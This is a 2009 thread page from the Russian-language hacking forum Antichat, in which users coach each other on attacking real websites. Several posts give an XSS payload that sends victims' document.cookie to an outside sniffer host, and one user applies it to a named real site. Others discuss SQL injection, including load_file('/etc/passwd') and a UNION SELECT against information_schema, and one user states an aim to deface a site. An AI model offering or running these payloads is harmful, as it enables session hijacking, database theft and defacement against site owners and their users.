ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6451  
Старый 06.04.2009, 17:10
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Saiga, если пасивка, то кидаешь с линком что то типа:
<script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
да в принципе если и активка, то этот вариант подойдёт

цитата ниженаписанного:
Цитата:
как я понял из его вопроса он не может сформировать правильный линк...
Цитата:
...а вот kak подставить к ссылке никак не понимаю. сайт не хочу пока что давать.
без линка сложно будет помочь...
Иногда линк формируется примерно так:
http://site.com/blablabla.php"><script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>

Ну это лишь один из случаев...

Последний раз редактировалось -m0rgan-; 06.04.2009 в 17:40..
 
Ответить с цитированием

  #6452  
Старый 06.04.2009, 17:26
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235

Репутация: 39
По умолчанию

Цитата:
Сообщение от joks  
я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий...

з.ы.
но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
3 буквы ру стоят 1 бакс
http://www.drupal.ru/node/26048
 
Ответить с цитированием

  #6453  
Старый 06.04.2009, 17:28
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от -m0rgan-  
Saiga, если пасивка, то кидаешь с линком что то типа:
<script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
да в принципе если и активка, то этот вариант подойдёт
как я понял из его вопроса он не может сформировать правильный линк... так что не надо меня пугать jokester"om ми нисколько не боится.

PS jokester, ты всех тут запугал

Последний раз редактировалось xcedz; 06.04.2009 в 17:31..
 
Ответить с цитированием

  #6454  
Старый 06.04.2009, 18:13
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию

http://www.toidutare.ee//retsept.php?otsi=1

<scr_ipt>im*g=new Image();im*g.src="http://sniffer.xaknet.ru/userbars/img_4_551.gi*f?"+document.cookie;</scri_pt>


что то такое ? но на сниффере , самого меня показывает ))

это пассивка , спс за помощь

Последний раз редактировалось Saiga; 06.04.2009 в 18:22..
 
Ответить с цитированием

  #6455  
Старый 06.04.2009, 18:15
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

Привет всем ребята помогите

Нашел сайтик что мне нужно! сделал sql-inj

Узнал

Версия версия СУБД (базы данных) - 5.0.45

пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?

,load_file(0x2f6574632f706173737764)

load_file(/etc/passwd/)

И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю
 
Ответить с цитированием

  #6456  
Старый 06.04.2009, 18:22
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Значит не судьба, если нужен так именно этот сайт, попробуй поискать баги у "соседей".
 
Ответить с цитированием

  #6457  
Старый 06.04.2009, 18:23
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Цитата:
Сообщение от Saiga  
http://www.toidutare.ee//retsept.php?otsi=1
Сиега, пихаешь в уязвимое поле свой яваскрипт, например "><script>alert()</script> и смотри в адресную строку:
Код:
http://www.toidutare.ee//retsept.php?otsi=1&string=&string2=&string3=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&liik=
Этот линк и кидать, с другими даннымы разумеется...
 
Ответить с цитированием

  #6458  
Старый 06.04.2009, 18:25
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от massovka  
Привет всем ребята помогите

Нашел сайтик что мне нужно! сделал sql-inj

Узнал

Версия версия СУБД (базы данных) - 5.0.45

пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?

,load_file(0x2f6574632f706173737764)

load_file(/etc/passwd/)

И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю
Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь:

union+select+table_name+from+information_schema.ta bles
 
Ответить с цитированием

  #6459  
Старый 06.04.2009, 18:31
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Сообщение от Pashkela  
Прежде чем смотреть поля, надо узнать в каких таблицах ты эти поля смотришь:

union+select+table_name+from+information_schema.ta bles
Скорее всего он таблицы называет полями.
 
Ответить с цитированием

  #6460  
Старый 06.04.2009, 18:38
massovka
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541

Репутация: 5
По умолчанию

information_schema.tables вот тут смотрю все 115 полей посмотрел ничего нет ставил стандартные название ничего пусто
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ